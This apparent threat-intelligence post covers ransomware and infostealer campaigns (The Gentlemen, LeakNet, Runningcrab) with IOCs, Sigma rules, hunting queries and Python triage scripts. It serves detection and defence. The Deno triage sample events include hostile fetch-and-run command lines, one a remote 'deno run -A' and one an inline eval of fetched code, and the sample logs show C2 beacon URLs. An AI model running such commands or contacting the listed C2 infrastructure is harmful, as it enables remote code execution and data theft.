Recent OTX Pulse data reveals a convergence of sophisticated RaaS operations and targeted supply chain compromises. We are tracking active campaigns by "The Gentlemen" threat actor, who has expanded operations to include the LockBit 5.0, Babuk, and Medusa ransomware families and gains initial access by exploiting public-facing systems. The pulse lists the FortiOS/FortiProxy authentication bypass CVE-2024-55591 as the primary vector, alongside CVE-2023-27532 (Veeam Backup & Replication), CVE-2024-37085 (VMware ESXi Active Directory integration bypass) and CVE-2025-32463 (sudo local privilege escalation).
Simultaneously, the "LeakNet" actor is scaling operations by moving away from Initial Access Brokers (IABs) to self-managed campaigns utilizing "ClickFix" social engineering lures and a novel Deno-based in-memory loader to deliver ransomware. In a separate but critical campaign, the "Runningcrab" actor (associated with PlugX and Sogu malware families) is conducting a supply chain attack targeting users of "Cobra DocGuard" software, deploying the "Infostealer.Speagle" to exfiltrate sensitive data under the guise of legitimate software traffic.
The common objective across these pulses is data exfiltration followed by system encryption, with adversaries increasingly abusing legitimate tools (Deno, DocGuard) to bypass EDR controls.
Threat Actor / Malware Profile
The Gentlemen
- Type: RaaS (Ransomware-as-a-Service)
- Malware Families: Babuk (S0638), Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa.
- Distribution: Exploitation of public-facing applications, specifically the FortiOS/FortiProxy authentication bypass CVE-2024-55591 (the pulse also lists Veeam, VMware ESXi and sudo CVEs; see IOC Analysis).
- Persistence/Behavior: Maintains a database of compromised devices; utilizes advanced defense evasion. Tactics include credential dumping and lateral movement typical of APT operations.
- C2/Exfiltration: Standard ransomware C2 beacons; exfiltration prior to encryption.
Runningcrab / Infostealer.Speagle
- Type: Nation-State / Espionage-aligned Infostealer
- Malware Families: Infostealer.Speagle, PlugX (S0013), DestroyRAT, Korplug.
- Distribution: Supply chain compromise via legitimate "Cobra DocGuard" software updates/installers.
- Persistence/Behavior: Hijacks DocGuard functionality to mask communications. Collects sensitive system info and documents.
- C2/Exfiltration: Transmits data to compromised Cobra DocGuard servers (IPs: 222.222.254.165, 60.30.147.18), making traffic appear as legitimate policy synchronization requests (/CDGServer3/CDGClientDiagnostics).
LeakNet
- Type: Ransomware Operator
- Distribution: ClickFix (fake browser update lures) on compromised websites.
- Persistence/Behavior: Uses a Deno-based loader for in-memory execution to evade disk-based scanning. Post-exploitation involves side-loading jli.dll and lateral movement via PsExec.
- Infrastructure: Uses compromised domains for infrastructure and S3 buckets for data staging.
IOC Analysis
The provided indicators require immediate operationalization across security stacks:
- CVEs (The Gentlemen): CVE-2023-27532 (Veeam Backup & Replication), CVE-2024-37085 (VMware ESXi), CVE-2024-55591 (FortiOS/FortiProxy), CVE-2025-32463 (sudo).
- Action: Prioritize patching Fortinet devices immediately (CVE-2024-55591), then Veeam servers and ESXi hosts. Use vulnerability scanners to detect unpatched FortiOS instances, and confirm sudo packages are current on Linux hosts.
- File Hashes (Multiple Actors): A mix of MD5, SHA1, and SHA256 hashes associated with LockBit, Babuk, Speagle, and PlugX.
- Action: Block execution of these files on endpoints via EDR policies. Use YARA or hash sets to hunt for historical presence.
- URLs/IPs (Runningcrab): Specific HTTP endpoints on ports 8090/8091.
- Action: Block all outbound traffic to 222.222.254.165 and 60.30.147.18, not only on 8090/8091. Inspect HTTP (and decrypted HTTPS, where available) traffic for the /CDGServer3/CDGClientDiagnostics URI going to any server other than your own DocGuard server.
- Domains (LeakNet): 8 domains identified (e.g., okobojirent.com, mshealthmetrics.com).
- Action: Sinkhole or block DNS resolution for these domains. These are likely used for ClickFix redirection or C2.
Detection Engineering
```yaml
title: FortiOS Management API Access From Unexpected Source - The Gentlemen
id: 8c7a9b2e-5f4d-4a6e-9b1c-3d4e5f6a7b8c
description: Detects HTTP POST requests to the FortiOS REST API on a FortiGate management interface from hosts outside the administrative allowlist, as a proxy for exploitation of the FortiOS/FortiProxy authentication bypass CVE-2024-55591 used by The Gentlemen. Requires HTTP-layer visibility of management-interface traffic.
author: Security Arsenal
date: 2026/04/19
modified: 2026/04/19
status: experimental
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: proxy
detection:
    selection:
        dst_ip: 'your_fortigate_management_ip'   # placeholder: management interface address
        dst_port:
            - 443
            - 8443
        cs-method: 'POST'
        c-uri|contains:
            - '/api/v2/cmdb'
            - '/api/v2/mon'
    filter_admin_hosts:
        src_ip|cidr: '10.0.0.0/24'   # placeholder: admin jump hosts / management subnet
    condition: selection and not filter_admin_hosts
falsepositives:
    - Administrative API calls from hosts not yet in the allowlist
    - Automation or monitoring systems that call the FortiOS API
level: high
```
```yaml
title: Cobra DocGuard Suspicious C2 Traffic - Speagle Infostealer
id: 9d8b0c3f-6a5e-4b7f-8c2d-4e5f6a7b8c9d
description: Detects connections to known Infostealer.Speagle C2 infrastructure, or DocGuard policy-synchronization requests (/CDGServer3/CDGClientDiagnostics?flag=syn_user_policy) sent to a server other than the organisation's own Cobra DocGuard server. The URI is the legitimate DocGuard path, so on its own it only indicates compromise when the destination is unexpected.
author: Security Arsenal
date: 2026/04/19
status: experimental
tags:
    - attack.command_and_control
    - attack.t1071.001
    - attack.exfiltration
    - attack.t1041
logsource:
    category: proxy
detection:
    selection_c2_ip:
        dst_ip:
            - '222.222.254.165'
            - '60.30.147.18'
    selection_docguard_uri:
        c-uri|contains: '/CDGServer3/CDGClientDiagnostics'
    filter_own_server:
        dst_ip: 'your_docguard_server_ip'   # placeholder: legitimate DocGuard server(s)
    condition: selection_c2_ip or (selection_docguard_uri and not filter_own_server)
falsepositives:
    - Legitimate DocGuard servers not yet added to filter_own_server
level: critical
```
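The masquerade described in the Runningcrab profile is the part that trips up a naive rule: the URI is the legitimate DocGuard policy-sync path, so matching on it alone fires on every healthy DocGuard client. The following Python is an added example, not code from the pulse or from the DocGuard vendor; it applies the same logic as the rule above to proxy log lines, treating the listed C2 addresses as critical on their own and the DocGuard URI as suspicious only when it goes to a server outside an allowlist. The Squid-style log format, the sample lines and the allowlisted server 10.20.30.40 are constructed for this example.

```python
"""Triage proxy log lines for Infostealer.Speagle C2 masquerading as DocGuard.

Added example (not the pulse's or vendor's code). Known C2 IPs are critical
regardless of path or port; the DocGuard diagnostics URI is only interesting
when its destination is not the organisation's own DocGuard server.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Indicators from the pulse (see IOC Analysis above).
SPEAGLE_C2_IPS = {"222.222.254.165", "60.30.147.18"}
SPEAGLE_C2_PORTS = {8090, 8091}
DOCGUARD_DIAG_PATH = "/CDGServer3/CDGClientDiagnostics"

# Assumption: the organisation's legitimate DocGuard server(s). Placeholder value.
LEGIT_DOCGUARD_SERVERS = {"10.20.30.40"}

# Squid native access.log layout: time elapsed client code/status bytes method url ...
# Constructed for this example; adapt the regex to your proxy's format.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)

# Constructed sample lines: C2 hit, legitimate sync, masqueraded sync, noise, C2 hit off-path.
SAMPLE_LOG = """\
1735689600.123    120 10.1.5.22 TCP_MISS/200 512 GET http://222.222.254.165:8090/CDGServer3/CDGClientDiagnostics?flag=syn_user_policy - HIER_DIRECT/222.222.254.165 text/html
1735689601.456     80 10.1.5.23 TCP_MISS/200 300 GET http://10.20.30.40:8090/CDGServer3/CDGClientDiagnostics?flag=syn_user_policy - HIER_DIRECT/10.20.30.40 text/html
1735689602.789     95 10.1.5.24 TCP_MISS/200 700 POST http://203.0.113.9:8091/CDGServer3/CDGClientDiagnostics?flag=syn_user_policy - HIER_DIRECT/203.0.113.9 text/html
1735689603.000     40 10.1.5.25 TCP_MISS/200 200 GET https://www.example.com/index.html - HIER_DIRECT/93.184.216.34 text/html
1735689604.000     40 10.1.5.26 TCP_MISS/200 200 GET http://60.30.147.18/update/check - HIER_DIRECT/60.30.147.18 text/html
"""


def classify(line):
    """Return a finding dict for one log line, or None if the line is uninteresting."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    host = url.hostname or ""
    port = url.port or (443 if url.scheme == "https" else 80)
    flag = parse_qs(url.query).get("flag", [None])[0]
    finding = {"client": m.group("client"), "host": host, "port": port,
               "path": url.path, "flag": flag}

    if host in SPEAGLE_C2_IPS:
        # Listed C2 infrastructure: critical no matter which path or port is used.
        finding.update(severity="critical", reason="known Speagle C2 address")
        return finding
    if url.path == DOCGUARD_DIAG_PATH and host not in LEGIT_DOCGUARD_SERVERS:
        # Legitimate-looking policy sync going to a server we do not run: the masquerade.
        severity = "high" if port in SPEAGLE_C2_PORTS else "medium"
        finding.update(severity=severity,
                       reason="DocGuard diagnostics URI to non-allowlisted server")
        return finding
    return None


def triage(log_text):
    """Classify every line of a log; return the list of findings in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(f"[{finding['severity']}] {finding['client']} -> "
              f"{finding['host']}:{finding['port']}{finding['path']} ({finding['reason']})")
```

On the constructed sample the second line (a client syncing with the allowlisted server) produces no finding, which is the behaviour a bare URI match would get wrong; the fifth line is flagged critical even though it uses port 80 and a different path, because the destination address is itself the indicator.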
```yaml
title: Deno Based In-Memory Execution - LeakNet Loader
id: 0e1f2a3b-4c5d-6e7f-8a9b-0c1d2e3f4a5b
description: Detects the Deno runtime running or evaluating code fetched over HTTP(S), the pattern of the LeakNet ClickFix loader that keeps its payload in memory rather than on disk.
author: Security Arsenal
date: 2026/04/19
status: experimental
tags:
    - attack.execution
    - attack.t1059.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\deno.exe'
    selection_subcommand:
        CommandLine|contains:
            - ' run '
            - ' eval '
    selection_remote:
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Developers running Deno modules directly from a URL
level: medium
```
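The rule above works on substrings; when triaging the hits, it helps to actually parse the command line and separate a developer's local `deno run` from the loader pattern (a module pulled over HTTP(S), or inline `eval`, typically with broad permissions and launched from the Run dialog or a terminal the lure told the victim to open). The following Python is an added example, not code from the pulse: it tokenises deno.exe command lines from process-creation events and assigns a verdict. The parent-process list is an assumption for this example and all sample events are constructed.

```python
"""Triage deno.exe command lines from process-creation telemetry.

Added example (not the pulse's code). Deno fetching a module over HTTP(S)
or evaluating inline code is the loader pattern the Sigma rule targets;
a local `deno run` from an editor is developer noise.
"""
import ntpath
import shlex

REMOTE_SCHEMES = ("http://", "https://")
EXEC_SUBCOMMANDS = {"run", "eval"}
# Assumption: parents a ClickFix victim would launch deno from (Run dialog or a
# terminal the lure told them to open). Developer parents are deliberately absent.
LURE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}

# Constructed sample events; 203.0.113.7 is a documentation address, not a real IOC.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe",
     "cmdline": r'"C:\Users\u\AppData\Local\deno\deno.exe" run -A https://203.0.113.7/loader.ts'},
    {"parent": "cmd.exe",
     "cmdline": 'deno.exe eval "fetch(\'https://203.0.113.7/s\').then(r=>r.text()).then(eval)"'},
    {"parent": "Code.exe", "cmdline": "deno.exe run --allow-net main.ts"},
    {"parent": "cmd.exe", "cmdline": "deno.exe --version"},
    {"parent": "Code.exe", "cmdline": "deno.exe run https://deno.land/std/examples/welcome.ts"},
]


def triage_event(event):
    """Return a verdict dict for a deno.exe process event, or None if it is not deno."""
    # posix=False keeps Windows backslashes intact and returns quoted args with quotes.
    argv = shlex.split(event["cmdline"], posix=False)
    if not argv:
        return None
    image = ntpath.basename(argv[0].strip('"')).lower()
    if image not in ("deno.exe", "deno"):
        return None
    args = [a.strip('"') for a in argv[1:]]
    subcommand = next((a for a in args if not a.startswith("-")), None)
    remote = [a for a in args if a.lower().startswith(REMOTE_SCHEMES)]
    inline = subcommand == "eval"
    permissions = [a for a in args if a == "-A" or a.startswith("--allow-")]
    parent = event.get("parent", "").lower()

    if subcommand not in EXEC_SUBCOMMANDS:
        verdict = "benign"          # version checks, install, etc.
    elif remote or inline:
        # Code arriving over the network or inline is the in-memory loader pattern;
        # broad permissions or a lure-style parent raise it to high.
        verdict = "high" if (permissions or parent in LURE_PARENTS) else "suspicious"
    else:
        verdict = "low"             # local script, most likely a developer
    return {"verdict": verdict, "subcommand": subcommand, "remote": remote,
            "inline_eval": inline, "permissions": permissions, "parent": parent}


def triage(events):
    """Triage a list of process events; non-deno events are dropped."""
    return [r for r in (triage_event(e) for e in events) if r]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"[{result['verdict']}] parent={result['parent']} sub={result['subcommand']} "
              f"remote={result['remote']} eval={result['inline_eval']} perms={result['permissions']}")
```

The fifth sample (a developer running a module from deno.land out of an editor) still comes back as suspicious, which is the right outcome for a triage step: it is the case the rule's false-positive note describes, and the parent and permissions fields are what the analyst uses to close it.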
```kql
// Hunt for LeakNet ClickFix domains and Runningcrab C2 IPs (last 7 days)
let leaknet_domains = dynamic([
    "okobojirent.com", "mshealthmetrics.com", "serialmenot.com", "neremedysoft.com",
    "cnoocim.com", "apiclofront.com", "crahdhduf.com", "delhedghogeggs.com"]);
let runningcrab_ips = dynamic(["222.222.254.165", "60.30.147.18"]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (leaknet_domains) or RemoteIP in (runningcrab_ips)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName,
          InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
```
```powershell
# PowerShell hunt script for Speagle and ransomware file hashes
# SHA256 values from the OTX Pulse
$targetHashes = @(
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2",
    "03298f85eaf8880222cf8a83b8ed75d90712c34a8a5299a60f47927ad044b43b",
    "d7f167cbf1676c14fd487219447e30fadf26885eb25ec4cafdeabe333bddf877",
    "dcd3f06093bf34d81837d837c5a5935beb859ba6258e5a80c3a5f95638a13d4d",
    "fad8d0307db5328c8b9f283a2cc6f7e4f4333001623fef5bd5c32a1c094bf890"
)
# Common download, temp and staging directories
$paths = @("C:\Users\", "C:\Windows\Temp\", "C:\ProgramData\")
$hits = @()
Write-Host "[+] Hunting for known The Gentlemen and Speagle malware hashes..."
foreach ($path in $paths) {
    if (-not (Test-Path $path)) { continue }
    # -File skips directories (Get-FileHash cannot hash them); -Force includes hidden files
    Get-ChildItem -Path $path -Recurse -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $hash = Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
        # -contains is case-insensitive, so the upper-case hex from Get-FileHash matches the list
        if ($hash -and ($targetHashes -contains $hash.Hash)) {
            Write-Host "[!] THREAT DETECTED: $($_.FullName) ($($hash.Hash))" -ForegroundColor Red
            $hits += $_.FullName
        }
    }
}
Write-Host "[+] Done. $($hits.Count) matching file(s) found."
```
Response Priorities
Immediate
- Block IOCs: Push all listed domains and IP addresses to perimeter firewalls, secure web gateways, and EDR blocklists.
- Patch FortiOS: Immediately apply the fix for CVE-2024-55591 on all FortiOS/FortiProxy devices and remove management-interface exposure from untrusted networks; patch Veeam Backup & Replication (CVE-2023-27532), VMware ESXi (CVE-2024-37085) and sudo (CVE-2025-32463) with the same urgency. Audit VPN and administrator login logs for brute forcing, unexpected admin logins, or newly created admin accounts.
24 Hours
- Supply Chain Audit: Identify endpoints running "Cobra DocGuard". Network hunt for connections to the non-standard IP addresses listed in the Runningcrab pulse.
- Memory Forensics: Scan endpoints for Deno-based processes or jli.dll side-loading activity indicative of LeakNet.
1 Week
- Architecture Hardening: Implement strict URL filtering for "ClickFix" style lures (fake browser updates). Review software supply chain integrity for DocGuard and similar utilities.
- Credential Reset: If Infostealer.Speagle activity is suspected, force a password reset for privileged accounts used on compromised machines.